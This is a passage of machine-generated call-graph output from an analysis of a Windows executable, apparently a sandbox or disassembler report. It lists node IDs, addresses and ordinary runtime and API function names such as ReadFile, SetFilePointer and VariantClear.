422bf9 87236->87260 87239 41d47f 87269 417f25 10 API calls __cftoa_l 87239->87269 87240 41499d 87253 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87240->87253 87242->87235 87248 41d421 87242->87248 87265 41341f 58 API calls 2 library calls 87242->87265 87244 41d41a 87244->87248 87266 41341f 58 API calls 2 library calls 87244->87266 87246 41d439 87246->87248 87267 41341f 58 API calls 2 library calls 87246->87267 87248->87235 87248->87236 87249->87197 87250->87209 87251->87209 87252->87209 87253->87209 87259 4181f2 LeaveCriticalSection 87254->87259 87256 41d602 87256->87219 87257->87226 87258->87226 87259->87256 87270 422b35 87260->87270 87262 422c14 87262->87240 87263->87233 87264->87240 87265->87244 87266->87246 87267->87248 87268->87239 87269->87240 87271 422b41 __tzset_nolock 87270->87271 87272 422b54 87271->87272 87274 422b8a 87271->87274 87273 417f77 __cftoa_l 46 API calls 87272->87273 87275 422b59 87273->87275 87276 422400 __tsopen_nolock 109 API calls 87274->87276 87277 417f25 __cftoa_l 10 API calls 87275->87277 87278 422ba4 87276->87278 87280 422b63 __tzset_nolock 87277->87280 87279 422bcb __wsopen_helper LeaveCriticalSection 87278->87279 87279->87280 87280->87262 87283 4150dd __tzset_nolock 87281->87283 87282 4150e9 87312 417f77 46 API calls __getptd_noexit 87282->87312 87283->87282 87284 41510f 87283->87284 87294 415471 87284->87294 87286 4150ee 87313 417f25 10 API calls __cftoa_l 87286->87313 87293 4150f9 __tzset_nolock 87293->87138 87295 415483 87294->87295 87296 4154a5 EnterCriticalSection 87294->87296 87295->87296 87297 41548b 87295->87297 87299 415117 87296->87299 87298 4182cb __lock 46 API calls 87297->87298 87298->87299 87300 415047 87299->87300 87301 415067 87300->87301 87302 415057 87300->87302 87307 415079 87301->87307 87315 414e4e 87301->87315 87370 417f77 46 API calls __getptd_noexit 87302->87370 87306 41505c 87314 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87306->87314 87332 41443c 87307->87332 87310 4150b9 87345 41e1f4 87310->87345 87312->87286 87313->87293 87314->87293 87316 414e61 87315->87316 87317 414e79 87315->87317 87371 417f77 46 API calls __getptd_noexit 87316->87371 87319 414139 __flush 46 API calls 87317->87319 87321 414e80 87319->87321 87320 414e66 87372 417f25 10 API calls __cftoa_l 87320->87372 87323 41e1f4 __write 51 API calls 87321->87323 87324 414e97 87323->87324 87325 414f09 87324->87325 87327 414ec9 87324->87327 87331 414e71 87324->87331 87373 417f77 46 API calls __getptd_noexit 87325->87373 87328 41e1f4 __write 51 API calls 87327->87328 87327->87331 87329 414f64 87328->87329 87330 41e1f4 __write 51 API calls 87329->87330 87329->87331 87330->87331 87331->87307 87333 414477 87332->87333 87334 414455 87332->87334 87338 414139 87333->87338 87334->87333 87335 414139 __flush 46 API calls 87334->87335 87336 414470 87335->87336 87374 41b7b2 77 API calls 6 library calls 87336->87374 87339 414145 87338->87339 87340 41415a 87338->87340 87375 417f77 46 API calls __getptd_noexit 87339->87375 87340->87310 87342 41414a 87376 417f25 10 API calls __cftoa_l 87342->87376 87344 414155 87344->87310 87346 41e200 __tzset_nolock 87345->87346 87347 41e223 87346->87347 87348 41e208 87346->87348 87350 41e22f 87347->87350 87353 41e269 87347->87353 87397 417f8a 46 API calls __getptd_noexit 87348->87397 87399 417f8a 46 API calls __getptd_noexit 87350->87399 87351 41e20d 87398 417f77 46 API calls __getptd_noexit 87351->87398 87377 41ae56 87353->87377 87355 41e234 87400 417f77 46 API calls __getptd_noexit 87355->87400 87358 41e23c 87401 417f25 10 API calls __cftoa_l 87358->87401 87359 41e26f 87361 41e291 87359->87361 87362 41e27d 87359->87362 87402 417f77 46 API calls __getptd_noexit 87361->87402 87387 41e17f 87362->87387 87363 41e215 __tzset_nolock 87363->87306 87366 41e289 87404 41e2c0 LeaveCriticalSection __unlock_fhandle 87366->87404 87367 41e296 87403 417f8a 46 API calls __getptd_noexit 87367->87403 87370->87306 87371->87320 87372->87331 87373->87331 87374->87333 87375->87342 87376->87344 87378 41ae62 __tzset_nolock 87377->87378 87379 41aebc 87378->87379 87381 4182cb __lock 46 API calls 87378->87381 87380 41aec1 EnterCriticalSection 87379->87380 87382 41aede __tzset_nolock 87379->87382 87380->87382 87383 41ae8e 87381->87383 87382->87359 87384 41aeaa 87383->87384 87385 41ae97 InitializeCriticalSectionAndSpinCount 87383->87385 87386 41aeec ___lock_fhandle LeaveCriticalSection 87384->87386 87385->87384 87386->87379 87388 41aded __lseek_nolock 46 API calls 87387->87388 87389 41e18e 87388->87389 87390 41e1a4 SetFilePointer 87389->87390 87391 41e194 87389->87391 87393 41e1c3 87390->87393 87394 41e1bb GetLastError 87390->87394 87392 417f77 __cftoa_l 46 API calls 87391->87392 87395 41e199 87392->87395 87393->87395 87396 417f9d __dosmaperr 46 API calls 87393->87396 87394->87393 87395->87366 87396->87395 87397->87351 87398->87363 87399->87355 87400->87358 87401->87363 87402->87367 87403->87366 87404->87363 87406 4149ea 87405->87406 87407 4149fe 87405->87407 87451 417f77 46 API calls __getptd_noexit 87406->87451 87409 4149fa 87407->87409 87411 41443c __flush 77 API calls 87407->87411 87423 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87409->87423 87410 4149ef 87452 417f25 10 API calls __cftoa_l 87410->87452 87413 414a0a 87411->87413 87424 41d8c2 87413->87424 87416 414139 __flush 46 API calls 87417 414a18 87416->87417 87428 41d7fe 87417->87428 87419 414a1e 87419->87409 87420 413748 _free 46 API calls 87419->87420 87420->87409 87421->87152 87422->87155 87423->87155 87425 414a12 87424->87425 87426 41d8d2 87424->87426 87425->87416 87426->87425 87427 413748 _free 46 API calls 87426->87427 87427->87425 87429 41d80a __tzset_nolock 87428->87429 87430 41d812 87429->87430 87431 41d82d 87429->87431 87468 417f8a 46 API calls __getptd_noexit 87430->87468 87433 41d839 87431->87433 87437 41d873 87431->87437 87470 417f8a 46 API calls __getptd_noexit 87433->87470 87435 41d817 87469 417f77 46 API calls __getptd_noexit 87435->87469 87436 41d83e 87471 417f77 46 API calls __getptd_noexit 87436->87471 87440 41ae56 ___lock_fhandle 48 API calls 87437->87440 87442 41d879 87440->87442 87441 41d846 87472 417f25 10 API calls __cftoa_l 87441->87472 87444 41d893 87442->87444 87445 41d887 87442->87445 87473 417f77 46 API calls __getptd_noexit 87444->87473 87453 41d762 87445->87453 87446 41d81f __tzset_nolock 87446->87419 87449 41d88d 87474 41d8ba LeaveCriticalSection __unlock_fhandle 87449->87474 87451->87410 87452->87409 87475 41aded 87453->87475 87455 41d772 87456 41d7c8 87455->87456 87458 41d7a6 87455->87458 87461 41aded __lseek_nolock 46 API calls 87455->87461 87488 41ad67 47 API calls 2 library calls 87456->87488 87458->87456 87459 41aded __lseek_nolock 46 API calls 87458->87459 87463 41d7b2 CloseHandle 87459->87463 87460 41d7d0 87464 41d7f2 87460->87464 87489 417f9d 46 API calls 3 library calls 87460->87489 87462 41d79d 87461->87462 87465 41aded __lseek_nolock 46 API calls 87462->87465 87463->87456 87466 41d7be GetLastError 87463->87466 87464->87449 87465->87458 87466->87456 87468->87435 87469->87446 87470->87436 87471->87441 87472->87446 87473->87449 87474->87446 87476 41ae12 87475->87476 87477 41adfa 87475->87477 87480 417f8a __chsize_nolock 46 API calls 87476->87480 87481 41ae51 87476->87481 87478 417f8a __chsize_nolock 46 API calls 87477->87478 87479 41adff 87478->87479 87482 417f77 __cftoa_l 46 API calls 87479->87482 87483 41ae23 87480->87483 87481->87455 87486 41ae07 87482->87486 87484 417f77 __cftoa_l 46 API calls 87483->87484 87485 41ae2b 87484->87485 87487 417f25 __cftoa_l 10 API calls 87485->87487 87486->87455 87487->87486 87488->87460 87489->87464 87491 414c82 __tzset_nolock 87490->87491 87492 414cc3 87491->87492 87493 414c96 __cftoa_l 87491->87493 87494 414cbb __tzset_nolock 87491->87494 87495 415471 __lock_file 47 API calls 87492->87495 87517 417f77 46 API calls __getptd_noexit 87493->87517 87494->87161 87497 414ccb 87495->87497 87503 414aba 87497->87503 87498 414cb0 87518 417f25 10 API calls __cftoa_l 87498->87518 87504 414af2 87503->87504 87508 414ad8 __cftoa_l 87503->87508 87519 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87504->87519 87505 414ae2 87570 417f77 46 API calls __getptd_noexit 87505->87570 87507 414ae7 87571 417f25 10 API calls __cftoa_l 87507->87571 87508->87504 87508->87505 87514 414b2d 87508->87514 87511 414c38 __cftoa_l 87573 417f77 46 API calls __getptd_noexit 87511->87573 87512 414139 __flush 46 API calls 87512->87514 87514->87504 87514->87511 87514->87512 87520 41dfcc 87514->87520 87550 41d8f3 87514->87550 87572 41e0c2 46 API calls 2 library calls 87514->87572 87517->87498 87518->87494 87519->87494 87521 41dfd8 __tzset_nolock 87520->87521 87522 41dfe0 87521->87522 87523 41dffb 87521->87523 87643 417f8a 46 API calls __getptd_noexit 87522->87643 87525 41e007 87523->87525 87528 41e041 87523->87528 87645 417f8a 46 API calls __getptd_noexit 87525->87645 87526 41dfe5 87644 417f77 46 API calls __getptd_noexit 87526->87644 87531 41e063 87528->87531 87532 41e04e 87528->87532 87530 41e00c 87646 417f77 46 API calls __getptd_noexit 87530->87646 87536 41ae56 ___lock_fhandle 48 API calls 87531->87536 87648 417f8a 46 API calls __getptd_noexit 87532->87648 87534 41e014 87647 417f25 10 API calls __cftoa_l 87534->87647 87538 41e069 87536->87538 87537 41e053 87649 417f77 46 API calls __getptd_noexit 87537->87649 87542 41e077 87538->87542 87543 41e08b 87538->87543 87541 41dfed __tzset_nolock 87541->87514 87574 41da15 87542->87574 87650 417f77 46 API calls __getptd_noexit 87543->87650 87546 41e083 87652 41e0ba LeaveCriticalSection __unlock_fhandle 87546->87652 87547 41e090 87651 417f8a 46 API calls __getptd_noexit 87547->87651 87551 41d900 87550->87551 87552 41d915 87550->87552 87656 417f77 46 API calls __getptd_noexit 87551->87656 87556 41d94a 87552->87556 87564 41d910 87552->87564 87653 420603 87552->87653 87554 41d905 87657 417f25 10 API calls __cftoa_l 87554->87657 87558 414139 __flush 46 API calls 87556->87558 87559 41d95e 87558->87559 87560 41dfcc __read 59 API calls 87559->87560 87561 41d965 87560->87561 87562 414139 __flush 46 API calls 87561->87562 87561->87564 87563 41d988 87562->87563 87563->87564 87565 414139 __flush 46 API calls 87563->87565 87564->87514 87566 41d994 87565->87566 87566->87564 87567 414139 __flush 46 API calls 87566->87567 87568 41d9a1 87567->87568 87569 414139 __flush 46 API calls 87568->87569 87569->87564 87570->87507 87571->87504 87572->87514 87573->87507 87575 41da31 87574->87575 87576 41da4c 87574->87576 87577 417f8a __chsize_nolock 46 API calls 87575->87577 87578 41da5b 87576->87578 87580 41da7a 87576->87580 87579 41da36 87577->87579 87581 417f8a __chsize_nolock 46 API calls 87578->87581 87584 417f77 __cftoa_l 46 API calls 87579->87584 87583 41da98 87580->87583 87597 41daac 87580->87597 87582 41da60 87581->87582 87585 417f77 __cftoa_l 46 API calls 87582->87585 87586 417f8a __chsize_nolock 46 API calls 87583->87586 87594 41da3e 87584->87594 87588 41da67 87585->87588 87590 41da9d 87586->87590 87587 41db02 87589 417f8a __chsize_nolock 46 API calls 87587->87589 87591 417f25 __cftoa_l 10 API calls 87588->87591 87592 41db07 87589->87592 87593 417f77 __cftoa_l 46 API calls 87590->87593 87591->87594 87595 417f77 __cftoa_l 46 API calls 87592->87595 87596 41daa4 87593->87596 87594->87546 87595->87596 87600 417f25 __cftoa_l 10 API calls 87596->87600 87597->87587 87597->87594 87598 41dae1 87597->87598 87599 41db1b 87597->87599 87598->87587 87606 41daec ReadFile 87598->87606 87601 416b04 __malloc_crt 46 API calls 87599->87601 87600->87594 87603 41db31 87601->87603 87609 41db59 87603->87609 87610 41db3b 87603->87610 87604 41dc17 87605 41df8f GetLastError 87604->87605 87613 41dc2b 87604->87613 87607 41de16 87605->87607 87608 41df9c 87605->87608 87606->87604 87606->87605 87617 417f9d __dosmaperr 46 API calls 87607->87617 87622 41dd9b 87607->87622 87611 417f77 __cftoa_l 46 API calls 87608->87611 87614 420494 __lseeki64_nolock 48 API calls 87609->87614 87612 417f77 __cftoa_l 46 API calls 87610->87612 87615 41dfa1 87611->87615 87616 41db40 87612->87616 87613->87622 87623 41dc47 87613->87623 87626 41de5b 87613->87626 87618 41db67 87614->87618 87619 417f8a __chsize_nolock 46 API calls 87615->87619 87620 417f8a __chsize_nolock 46 API calls 87616->87620 87617->87622 87618->87606 87619->87622 87620->87594 87621 413748 _free 46 API calls 87621->87594 87622->87594 87622->87621 87624 41dcab ReadFile 87623->87624 87633 41dd28 87623->87633 87627 41dcc9 GetLastError 87624->87627 87636 41dcd3 87624->87636 87625 41ded0 ReadFile 87628 41deef GetLastError 87625->87628 87634 41def9 87625->87634 87626->87622 87626->87625 87627->87623 87627->87636 87628->87626 87628->87634 87629 41ddec MultiByteToWideChar 87629->87622 87630 41de10 GetLastError 87629->87630 87630->87607 87631 41dda3 87639 41dd60 87631->87639 87640 41ddda 87631->87640 87632 41dd96 87635 417f77 __cftoa_l 46 API calls 87632->87635 87633->87622 87633->87631 87633->87632 87633->87639 87634->87626 87638 420494 __lseeki64_nolock 48 API calls 87634->87638 87635->87622 87636->87623 87637 420494 __lseeki64_nolock 48 API calls 87636->87637 87637->87636 87638->87634 87639->87629 87641 420494 __lseeki64_nolock 48 API calls 87640->87641 87642 41dde9 87641->87642 87642->87629 87643->87526 87644->87541 87645->87530 87646->87534 87647->87541 87648->87537 87649->87534 87650->87547 87651->87546 87652->87541 87654 416b04 __malloc_crt 46 API calls 87653->87654 87655 420618 87654->87655 87655->87556 87656->87554 87657->87564 87661 4148b3 GetSystemTimeAsFileTime __aulldiv 87658->87661 87660 442c6b 87660->87164 87661->87660 87662->87171 87663->87176 87664->87176 87668 45272f __tzset_nolock _wcscpy 87665->87668 87666 44afef GetSystemTimeAsFileTime 87666->87668 87667 4528a4 87667->87086 87667->87087 87668->87666 87668->87667 87669 414d04 61 API calls __fread_nolock 87668->87669 87670 4150d1 81 API calls _fseek 87668->87670 87669->87668 87670->87668 87672 44b1bc 87671->87672 87673 44b1ca 87671->87673 87674 4149c2 116 API calls 87672->87674 87675 44b1e1 87673->87675 87676 4149c2 116 API calls 87673->87676 87677 44b1d8 87673->87677 87674->87673 87706 4321a4 87675->87706 87678 44b2db 87676->87678 87677->87115 87678->87675 87681 44b2e9 87678->87681 87680 44b224 87682 44b253 87680->87682 87683 44b228 87680->87683 87684 44b2f6 87681->87684 87686 414a46 __fcloseall 82 API calls 87681->87686 87710 43213d 87682->87710 87685 44b235 87683->87685 87688 414a46 __fcloseall 82 API calls 87683->87688 87684->87115 87689 44b245 87685->87689 87691 414a46 __fcloseall 82 API calls 87685->87691 87686->87684 87688->87685 87689->87115 87690 44b25a 87692 44b260 87690->87692 87693 44b289 87690->87693 87691->87689 87695 44b26d 87692->87695 87698 414a46 __fcloseall 82 API calls 87692->87698 87720 44b0bf 87 API calls 87693->87720 87696 44b27d 87695->87696 87699 414a46 __fcloseall 82 API calls 87695->87699 87696->87115 87697 44b28f 87721 4320f8 46 API calls _free 87697->87721 87698->87695 87699->87696 87701 44b295 87702 414a46 __fcloseall 82 API calls 87701->87702 87704 44b2a2 87701->87704 87702->87704 87703 414a46 __fcloseall 82 API calls 87705 44b2b2 87703->87705 87704->87703 87704->87705 87705->87115 87707 4321cb 87706->87707 87709 4321b4 __tzset_nolock _memmove 87706->87709 87708 414d04 __fread_nolock 61 API calls 87707->87708 87708->87709 87709->87680 87711 4135bb _malloc 46 API calls 87710->87711 87712 432150 87711->87712 87713 4135bb _malloc 46 API calls 87712->87713 87714 432162 87713->87714 87715 4135bb _malloc 46 API calls 87714->87715 87716 432174 87715->87716 87719 432189 87716->87719 87722 4320f8 46 API calls _free 87716->87722 87718 432198 87718->87690 87719->87690 87720->87697 87721->87701 87722->87718 87723->87034 87724->87035 87725->87041 87726->87050 87727->87052 87728->87052 87778 410160 87729->87778 87731 41012f GetFullPathNameW 87732 410147 moneypunct 87731->87732 87732->86895 87734 4102cb SHGetDesktopFolder 87733->87734 87736 410333 _wcsncpy 87733->87736 87735 4102e0 _wcsncpy 87734->87735 87734->87736 87735->87736 87737 41031c SHGetPathFromIDListW 87735->87737 87736->86898 87737->87736 87739 4101bb 87738->87739 87743 425f4a 87738->87743 87740 410160 52 API calls 87739->87740 87742 4101c7 87740->87742 87741 4114ab __wcsicoll 58 API calls 87741->87743 87782 410200 52 API calls 2 library calls 87742->87782 87743->87741 87745 425f6e 87743->87745 87745->86900 87746 4101d6 87783 410200 52 API calls 2 library calls 87746->87783 87748 4101e9 87748->86900 87750 40f760 128 API calls 87749->87750 87751 40f584 87750->87751 87752 429335 87751->87752 87753 40f58c 87751->87753 87756 4528bd 118 API calls 87752->87756 87754 40f598 87753->87754 87755 429358 87753->87755 87794 4033c0 113 API calls 7 library calls 87754->87794 87795 434034 86 API calls _wprintf 87755->87795 87758 42934b 87756->87758 87761 429373 87758->87761 87762 42934f 87758->87762 87760 40f5b4 87760->86896 87765 4115d7 52 API calls 87761->87765 87764 431e58 82 API calls 87762->87764 87763 429369 87763->87761 87764->87755 87777 4293c5 moneypunct 87765->87777 87766 42959c 87767 413748 _free 46 API calls 87766->87767 87768 4295a5 87767->87768 87769 431e58 82 API calls 87768->87769 87770 4295b1 87769->87770 87774 401b10 52 API calls 87774->87777 87777->87766 87777->87774 87784 444af8 87777->87784 87787 44b41c 87777->87787 87796 44c7dd 64 API calls 3 library calls 87777->87796 87797 402780 52 API calls 2 library calls 87777->87797 87798 4022d0 52 API calls moneypunct 87777->87798 87779 410167 _wcslen 87778->87779 87780 4115d7 52 API calls 87779->87780 87781 41017e _wcscpy 87780->87781 87781->87731 87782->87746 87783->87748 87785 4115d7 52 API calls 87784->87785 87786 444b27 _memmove 87785->87786 87786->87777 87788 44b429 87787->87788 87789 4115d7 52 API calls 87788->87789 87790 44b440 87789->87790 87791 44b45e 87790->87791 87792 401b10 52 API calls 87790->87792 87791->87777 87793 44b453 87792->87793 87793->87777 87794->87760 87795->87763 87796->87777 87797->87777 87798->87777 87800 402539 moneypunct 87799->87800 87801 402417 87799->87801 87800->86904 87801->87800 87802 4115d7 52 API calls 87801->87802 87803 402443 87802->87803 87804 4115d7 52 API calls 87803->87804 87805 4024b4 87804->87805 87805->87800 87828 402880 87805->87828 87870 4022d0 52 API calls moneypunct 87805->87870 87813 401566 87808->87813 87809 401794 87885 40e9a0 90 API calls 87809->87885 87812 4010a0 52 API calls 87812->87813 87813->87809 87813->87812 87814 40167a 87813->87814 87815 4017c0 87814->87815 87886 45e737 90 API calls 3 library calls 87814->87886 87815->86906 87817 40bc70 52 API calls 87816->87817 87826 40d451 87817->87826 87818 40d50f 87889 410600 52 API calls 87818->87889 87820 427c01 87890 45e737 90 API calls 3 library calls 87820->87890 87821 40e0a0 52 API calls 87821->87826 87823 401b10 52 API calls 87823->87826 87824 40d519 87824->86909 87826->87818 87826->87820 87826->87821 87826->87823 87826->87824 87887 40f310 53 API calls 87826->87887 87888 40d860 91 API calls 87826->87888 87829 4115d7 52 API calls 87828->87829 87830 4028b3 87829->87830 87831 4115d7 52 API calls 87830->87831 87869 4028c5 moneypunct _memmove 87831->87869 87833 402b1e moneypunct 87833->87805 87834 427d62 87837 403350 52 API calls 87834->87837 87836 402bb6 87873 403060 53 API calls 87836->87873 87848 427d6b 87837->87848 87839 402bca 87841 427f63 87839->87841 87842 402bd4 87839->87842 87840 42802b moneypunct 87880 460879 92 API calls 3 library calls 87841->87880 87874 402780 52 API calls 2 library calls 87842->87874 87843 403350 52 API calls 87843->87869 87847 402bdf 87847->87805 87850 427f2c 87848->87850 87877 403020 52 API calls _memmove 87848->87877 87849 427fd5 87882 460879 92 API calls 3 library calls 87849->87882 87879 460879 92 API calls 3 library calls 87850->87879 87853 427f48 87853->87833 87855 402f00 52 API calls 87855->87869 87856 402aeb moneypunct 87856->87840 87872 402780 52 API calls 2 library calls 87856->87872 87858 427fe4 87883 402780 52 API calls 2 library calls 87858->87883 87859 427fa5 87881 402780 52 API calls 2 library calls 87859->87881 87860 428000 87884 460879 92 API calls 3 library calls 87860->87884 87861 4026f0 52 API calls 87864 402a85 CharUpperBuffW 87861->87864 87864->87869 87867 4115d7 52 API calls 87867->87869 87868 402780 52 API calls 87868->87869 87869->87834 87869->87836 87869->87843 87869->87849 87869->87850 87869->87855 87869->87856 87869->87859 87869->87860 87869->87861 87869->87867 87869->87868 87871 4031b0 63 API calls 87869->87871 87875 402f80 92 API calls _memmove 87869->87875 87876 402280 52 API calls 87869->87876 87878 4013a0 52 API calls 87869->87878 87870->87805 87871->87869 87872->87833 87873->87839 87874->87847 87875->87869 87876->87869 87877->87848 87878->87869 87879->87853 87880->87853 87881->87833 87882->87858 87883->87853 87884->87833 87885->87814 87886->87815 87887->87826 87888->87826 87889->87824 87890->87824 87891->86922 87892->86923 87894 42c5fe 87893->87894 87946 4091c6 87893->87946 87895 40bc70 52 API calls 87894->87895 87894->87946 87896 42c64e InterlockedIncrement 87895->87896 87897 42c665 87896->87897 87900 42c697 87896->87900 87899 42c672 InterlockedDecrement Sleep InterlockedIncrement 87897->87899 87897->87900 87898 42c737 InterlockedDecrement 87901 42c74a 87898->87901 87899->87897 87899->87900 87900->87898 87902 42c731 87900->87902 87904 408e80 VariantClear 87900->87904 87903 408f40 VariantClear 87901->87903 87902->87898 87905 42c752 87903->87905 87906 42c6cf 87904->87906 88195 410c60 VariantClear moneypunct 87905->88195 88186 45340c 87906->88186 87909 42c6db 87910 402160 52 API calls 87909->87910 87911 42c6e5 87910->87911 87912 45340c 85 API calls 87911->87912 87913 42c6f1 87912->87913 88192 40d200 52 API calls 2 library calls 87913->88192 87915 42c6fb 88193 465124 53 API calls 87915->88193 87917 42c715 87918 42c76a 87917->87918 87919 42c719 87917->87919 87920 401b10 52 API calls 87918->87920 88194 46fe32 VariantClear 87919->88194 87922 42c77e 87920->87922 87923 401980 53 API calls 87922->87923 87929 42c796 87923->87929 87924 42c812 88202 46fe32 VariantClear 87924->88202 87926 42c82a InterlockedDecrement 88203 46ff07 54 API calls 87926->88203 87928 42c864 88204 45e737 90 API calls 3 library calls 87928->88204 87929->87924 87929->87928 88196 40ba10 87929->88196 87940 408f40 VariantClear 87946->86970 87948 42c874 87948->87940 87950 42ca59 87948->87950 87950->87950 87952 40afc4 87951->87952 87953 40b156 87951->87953 87954 40afd5 87952->87954 87955 42d1e3 87952->87955 88259 45e737 90 API calls 3 library calls 87953->88259 87960 40a780 201 API calls 87954->87960 87976 40b11a moneypunct 87954->87976 88260 45e737 90 API calls 3 library calls 87955->88260 87958 42d1f8 87964 408f40 VariantClear 87958->87964 87959 40b143 87959->86970 87962 40b00a 87960->87962 87962->87958 87965 40b012 87962->87965 87963 42d4db 87963->87963 87964->87959 87966 40b04a 87965->87966 87967 42d231 VariantClear 87965->87967 87968 40b094 moneypunct 87965->87968 87975 40b05c moneypunct 87966->87975 88261 40e270 VariantClear moneypunct 87966->88261 87967->87975 87969 40b108 87968->87969 87972 42d425 moneypunct 87968->87972 87969->87976 88262 40e270 VariantClear moneypunct 87969->88262 87970 42d45a VariantClear 87970->87976 87972->87970 87972->87976 87973 4115d7 52 API calls 87973->87968 87975->87968 87975->87973 87976->87959 88263 45e737 90 API calls 3 library calls 87976->88263 87978 4096c6 _wcslen 87977->87978 87979 40a70c moneypunct _memmove 87978->87979 87980 4115d7 52 API calls 87978->87980 88265 4013a0 52 API calls 87979->88265 87981 4096fa _memmove 87980->87981 87982 4115d7 52 API calls 87981->87982 87984 40971b 87982->87984 87984->87979 87986 409749 CharUpperBuffW 87984->87986 87991 40976a moneypunct 87984->87991 87985 4297aa 87987 4115d7 52 API calls 87985->87987 87986->87991 87988 4297d1 _memmove 87987->87988 88291 45e737 90 API calls 3 library calls 87988->88291 87998 4097e5 moneypunct 87991->87998 88266 47dcbb 203 API calls 87991->88266 87992 408f40 VariantClear 87993 42ae92 87992->87993 88292 410c60 VariantClear moneypunct 87993->88292 87995 42aea4 87996 409aa2 87996->87988 87999 4115d7 52 API calls 87996->87999 88002 409afe 87996->88002 87997 40a689 88000 4115d7 52 API calls 87997->88000 87998->87988 87998->87996 87998->87997 88001 40c2c0 52 API calls 87998->88001 88007 429a46 VariantClear 87998->88007 88013 40a6af moneypunct _memmove 87998->88013 88014 408f40 VariantClear 87998->88014 88018 4115d7 52 API calls 87998->88018 88024 40ba10 52 API calls 87998->88024 88029 4299d9 87998->88029 88033 429abd 87998->88033 88040 40a780 201 API calls 87998->88040 88045 42a452 87998->88045 88267 40c4e0 201 API calls 87998->88267 88269 40e270 VariantClear moneypunct 87998->88269 87999->88002 88000->88013 88001->87998 88003 4115d7 52 API calls 88002->88003 88041 409b2a 88002->88041 88005 429d31 88003->88005 88004 429dbe 88006 429dd3 88004->88006 88274 40b400 VariantClear VariantClear moneypunct 88004->88274 88010 429d42 88005->88010 88270 44a801 52 API calls 88005->88270 88071 409b4d moneypunct _memmove 88006->88071 88275 40e1c0 VariantClear moneypunct 88006->88275 88007->87998 88008 409fd2 88012 40a045 88008->88012 88064 42a3f5 88008->88064 88019 40e0a0 52 API calls 88010->88019 88016 4115d7 52 API calls 88012->88016 88027 4115d7 52 API calls 88013->88027 88014->87998 88022 40a04c 88016->88022 88018->87998 88023 429d57 88019->88023 88028 40a0a7 88022->88028 88031 4091e0 324 API calls 88022->88031 88271 453443 52 API calls 88023->88271 88024->87998 88025 42a42f 88279 45e737 90 API calls 3 library calls 88025->88279 88027->87979 88047 40a0af 88028->88047 88280 40c790 VariantClear moneypunct 88028->88280 88032 408f40 VariantClear 88029->88032 88031->88028 88035 4299e2 88032->88035 88033->86970 88034 429d88 88272 453443 52 API calls 88034->88272 88268 410c60 VariantClear moneypunct 88035->88268 88040->87998 88041->88004 88041->88071 88273 40b400 VariantClear VariantClear moneypunct 88041->88273 88044 408f40 VariantClear 88079 40a162 moneypunct _memmove 88044->88079 88045->87992 88046 402780 52 API calls 88046->88071 88048 40a11b 88047->88048 88049 42a4b4 VariantClear 88047->88049 88047->88079 88055 40a12d moneypunct 88048->88055 88281 40e270 VariantClear moneypunct 88048->88281 88049->88055 88050 40a780 201 API calls 88050->88071 88051 408e80 VariantClear 88051->88071 88053 401980 53 API calls 88053->88071 88054 4115d7 52 API calls 88054->88079 88055->88054 88055->88079 88057 408e80 VariantClear 88057->88079 88058 44a801 52 API calls 88058->88071 88059 42a74d VariantClear 88059->88079 88060 41130a 51 API calls __cinit 88060->88071 88061 4115d7 52 API calls 88061->88071 88062 40a368 88063 42aad4 88062->88063 88072 40a397 88062->88072 88284 46fe90 VariantClear VariantClear moneypunct 88063->88284 88278 47390f VariantClear 88064->88278 88065 42a7e4 VariantClear 88065->88079 88066 42a886 VariantClear 88066->88079 88067 409c95 88067->86970 88068 40a3ce 88084 40a3d9 moneypunct 88068->88084 88285 40b400 VariantClear VariantClear moneypunct 88068->88285 88070 40e270 VariantClear 88070->88079 88071->87979 88071->88008 88071->88025 88071->88046 88071->88050 88071->88051 88071->88053 88071->88058 88071->88060 88071->88061 88071->88064 88071->88067 88276 45f508 52 API calls 88071->88276 88277 403e10 53 API calls 88071->88277 88072->88068 88096 40a42c moneypunct 88072->88096 88264 40b400 VariantClear VariantClear moneypunct 88072->88264 88075 42abaf 88080 42abd4 VariantClear 88075->88080 88090 40a4ee moneypunct 88075->88090 88076 4115d7 52 API calls 88076->88079 88077 40a4dc 88077->88090 88287 40e270 VariantClear moneypunct 88077->88287 88078 4115d7 52 API calls 88081 42a5a6 VariantInit VariantCopy 88078->88081 88079->88044 88079->88057 88079->88059 88079->88062 88079->88063 88079->88065 88079->88066 88079->88070 88079->88076 88079->88078 88282 470870 52 API calls 88079->88282 88283 44ccf1 VariantClear moneypunct 88079->88283 88080->88090 88081->88079 88086 42a5c6 VariantClear 88081->88086 88082 42ac4f 88091 42ac79 VariantClear 88082->88091 88097 40a546 moneypunct 88082->88097 88085 40a41a 88084->88085 88088 42ab44 VariantClear 88084->88088 88084->88096 88085->88096 88286 40e270 VariantClear moneypunct 88085->88286 88086->88079 88087 40a534 88087->88097 88288 40e270 VariantClear moneypunct 88087->88288 88088->88096 88090->88082 88090->88087 88091->88097 88092 42ad28 88095 40a571 88096->88075 88096->88077 88097->88092 88097->88095 88100 40a650 moneypunct 88100->86970 88105 408fff 88104->88105 88117 40900d 88104->88117 88293 403ea0 52 API calls __cinit 88105->88293 88108 42c3f6 88296 45e737 90 API calls 3 library calls 88108->88296 88110 42c44a 88298 45e737 90 API calls 3 library calls 88110->88298 88111 40a780 201 API calls 88111->88117 88112 4090f2 moneypunct 88112->86970 88113 42c47b 88299 451b42 61 API calls 88113->88299 88117->88108 88117->88110 88117->88111 88117->88112 88117->88113 88118 42c4cb 88117->88118 88119 42c564 88117->88119 88123 42c548 88117->88123 88125 409112 88117->88125 88126 4090df 88117->88126 88128 42c528 88117->88128 88130 4090ea 88117->88130 88295 4534e3 52 API calls 88117->88295 88297 40c4e0 201 API calls 88117->88297 88301 47faae 240 API calls 88118->88301 88120 408f40 VariantClear 88119->88120 88120->88112 88121 42c491 88121->88112 88300 45e737 90 API calls 3 library calls 88121->88300 88304 45e737 90 API calls 3 library calls 88123->88304 88124 42c4da 88124->88112 88302 45e737 90 API calls 3 library calls 88124->88302 88125->88123 88133 40912b 88125->88133 88126->88130 88131 408e80 VariantClear 88126->88131 88303 45e737 90 API calls 3 library calls 88128->88303 88135 408f40 VariantClear 88130->88135 88131->88130 88133->88112 88294 403e10 53 API calls 88133->88294 88135->88112 88137 40914b 88138 408f40 VariantClear 88137->88138 88138->88112 88305 408d90 88139->88305 88141 429778 88333 410c60 VariantClear moneypunct 88141->88333 88143 429780 